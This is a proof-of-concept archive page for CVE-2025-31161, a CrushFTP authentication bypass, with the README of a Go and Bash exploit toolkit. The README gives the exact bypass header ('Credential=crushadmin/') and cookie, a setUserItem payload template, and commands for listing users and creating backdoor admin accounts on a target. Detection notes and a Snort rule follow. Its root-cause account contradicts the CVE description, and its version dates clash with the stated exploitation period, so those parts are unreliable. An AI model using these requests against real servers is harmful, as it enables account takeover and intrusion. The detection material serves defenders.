Associated Vulnerability
Title:CrushFTP 安全漏洞 (CVE-2025-31161)Description:CrushFTP 10 before 10.8.4 and 11 before 11.3.1 allows authentication bypass and takeover of the crushadmin account (unless a DMZ proxy instance is used), as exploited in the wild in March and April 2025, aka "Unauthenticated HTTP(S) port access." A race condition exists in the AWS4-HMAC (compatible with S3) authorization method of the HTTP component of the FTP server. The server first verifies the existence of the user by performing a call to login_user_pass() with no password requirement. This will authenticate the session through the HMAC verification process and up until the server checks for user verification once more. The vulnerability can be further stabilized, eliminating the need for successfully triggering a race condition, by sending a mangled AWS4-HMAC header. By providing only the username and a following slash (/), the server will successfully find a username, which triggers the successful anypass authentication process, but the server will fail to find the expected SignedHeaders entry, resulting in an index-out-of-bounds error that stops the code from reaching the session cleanup. Together, these issues make it trivial to authenticate as any known or guessable user (e.g., crushadmin), and can lead to a full compromise of the system by obtaining an administrative account.
Readme
# CrushFTP Authentication Bypass - CVE-2025-31161
[](https://opensource.org/licenses/MIT)
[](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
[](https://golang.org/)
[](https://www.gnu.org/software/bash/)
A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.
## 🔍 What is CVE-2025-31161?
CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.
### Technical Details
- **CVSS Score**: TBD
- **Affected Software**: CrushFTP Web Interface
- **Attack Vector**: Network
- **Authentication Required**: None
- **Impact**: Complete system compromise through unauthorized account creation
## 🚀 Features
- **Multi-Language Support**: Go and Bash implementations
- **Smart Vulnerability Detection**: Automatically checks if target is vulnerable before exploitation
- **User Enumeration**: List existing users on vulnerable targets
- **User Creation**: Create new administrative accounts
- **Interactive Mode**: Prompts for credentials only when target is confirmed vulnerable
- **Shorthand Flags**: Quick access with `-t`, `-p`, `-tu` flags
- **Custom Port Support**: Configurable port for different deployment scenarios
- **Educational Focus**: Designed for CTF challenges and security research
## 📁 Repository Structure
```
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md # This documentation
├── cve-2025-31161.go # Go implementation (recommended)
├── cve-2025-31161.sh # Bash implementation
└── LICENSE # MIT License
```
## 🛠️ Installation & Requirements
### Prerequisites
#### For Go Version (Recommended)
```bash
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
```
#### For Bash Version
```bash
# Requires curl (usually pre-installed)
sudo apt install curl
```
### Quick Setup
```bash
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
```
## 🎯 Usage
### Go Version (Recommended)
#### List Users
```bash
# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu
# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu
# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu
```
#### Add New User
```bash
# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au
# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au
# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au
```
### Bash Version
#### List Users
```bash
# Basic usage
./cve-2025-31161.sh -t example.com -lu
# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu
```
#### Add New User
```bash
# Create new user
./cve-2025-31161.sh -t example.com -au
# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au
```
### Available Flags
| Flag | Long Form | Description | Default |
|------|-----------|-------------|---------|
| `-t` | `--target_host` | Target hostname or IP (required) | - |
| `-p` | `--port` | Target port | 80 |
| `-tu` | `--target_user` | Target user for exploitation | crushadmin |
| `-lu` | `--list-users` | List existing users | - |
| `-au` | `--add-user` | Add new user (interactive) | - |
| | `--help` | Show help message | - |
### Usage Examples
```bash
# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu
# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123
# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu
# View help
./cve-2025-31161.sh --help
```
## 🔄 How It Works
```mermaid
flowchart TD
A[Start Exploit] --> B[Check Target Connectivity]
B --> C{Target Reachable?}
C -->|No| D[Exit: Connection Failed]
C -->|Yes| E[Send getUserList Request]
E --> F{Response Contains OK?}
F -->|No| G[Exit: Not Vulnerable]
F -->|Yes| H[Target is Vulnerable!]
H --> I{Mode Selected?}
I -->|List Users -lu| J[Parse XML Response]
J --> K[Display User List]
K --> L[Exit: Success]
I -->|Add User -au| M[Prompt for Username]
M --> N[Prompt for Password]
N --> O[Send Warm-up Request]
O --> P[Craft User Creation Payload]
P --> Q[Send setUserItem Request]
Q --> R{User Created Successfully?}
R -->|Yes| S[Success: Account Created]
R -->|No| T[Failed: Exploitation Failed]
style A fill:#e1f5fe
style H fill:#c8e6c9
style K fill:#81c784
style S fill:#4caf50
style D fill:#ffcdd2
style G fill:#ffcdd2
style T fill:#ffcdd2
```
## 🧪 Exploit Flow Explained
### Step 1: Vulnerability Detection
The script first sends a `getUserList` request to check if the target is vulnerable:
```http
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```
If the response contains `<response_status>OK</response_status>`, the target is vulnerable.
### Step 2a: User Enumeration (List Users Mode)
When using the `-lu` flag, the script parses the XML response and extracts usernames:
```xml
<user_list type="vector">
<user_list_subitem>ben</user_list_subitem>
<user_list_subitem>crushadmin</user_list_subitem>
<user_list_subitem>default</user_list_subitem>
</user_list>
```
Output:
```
[+] Users:
- ben
- crushadmin
- default
```
### Step 2b: User Account Creation (Add User Mode)
When using the `-au` flag, the script sends a `setUserItem` request with malicious XML payload:
```http
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded
command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
```
### Step 3: Verification
The script checks for `<response_status>OK</response_status>` in the response to confirm successful user creation.
---
## ⚠️ Vulnerability Details
### Root Cause
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.
### Impact Assessment
- **Confidentiality**: HIGH - Unauthorized access to file system
- **Integrity**: HIGH - Ability to modify/upload files
- **Availability**: MEDIUM - Potential for resource exhaustion
### Attack Scenarios
1. **Initial Access**: Create backdoor accounts for persistent access
2. **Privilege Escalation**: Create admin-level accounts
3. **Data Exfiltration**: Access sensitive files through FTP interface
4. **Lateral Movement**: Use compromised FTP server as pivot point
---
## 🛡️ Detection & Mitigation
### Detection Methods
- Monitor for unusual `setUserItem` requests in web logs
- Check for new user accounts created outside normal processes
- Implement anomaly detection for authentication bypass patterns
### Mitigation Strategies
1. **Immediate**: Block access to `/webinterface/function/` endpoints
2. **Short-term**: Update to patched CrushFTP version
3. **Long-term**: Implement proper authentication controls
### Network Signatures
```bash
# Snort/Suricata Rule Example
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"setUserItem"; http_uri; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)
```
---
## 🎓 Educational Use Cases
### CTF Scenarios
- **Web Application Security**: Understanding authentication bypass vulnerabilities
- **Penetration Testing**: Demonstrating real-world exploitation techniques
- **Red Team Exercises**: Simulating APT-style attacks
### Learning Objectives
- Understanding HTTP request manipulation
- XML injection techniques
- Authentication bypass methodologies
- Multi-language exploit development
## 🚨 Legal Disclaimer
⚠️ **IMPORTANT**: This tool is designed for:
- Educational purposes
- Authorized penetration testing
- CTF competitions
- Security research in controlled environments
**DO NOT USE** on systems without explicit written permission. Unauthorized access to computer systems is illegal and may result in severe legal consequences.
## 🤝 Contributing
Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Create a Pull Request
### Development Guidelines
- Follow existing code style
- Add comprehensive comments
- Test on multiple target environments
- Update documentation for new features
## 📝 Version History
| Version | Date | Changes |
|---------|------|---------|
| 1.0.0 | 2025-01-XX | Initial release with Go and Bash implementations |
| 1.1.0 | 2025-01-XX | Interactive mode and vulnerability detection |
| 1.2.0 | 2025-10-02 | Added user enumeration (-lu), separate add user mode (-au), shorthand flags (-t, -p, -tu) |
## 📚 References
- [CVE-2025-31161 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
- [CrushFTP Official Website](https://www.crushftp.com/)
- [OWASP Authentication Bypass](https://owasp.org/www-community/attacks/Authentication_bypass)
- [Original Research by Immersive Labs](https://github.com/Immersive-Labs-Sec/CVE-2025-31161)
---
## 📧 Contact
For questions, suggestions, or security concerns, please open an issue in this repository.
File Snapshot
[4.0K] /data/pocs/12e70c57808d0606fa170381ddbc49bc3de74ba9
├── [7.3K] cve-2025-31161.go
├── [7.5K] cve-2025-31161.sh
└── [ 10K] README.md
1 directory, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →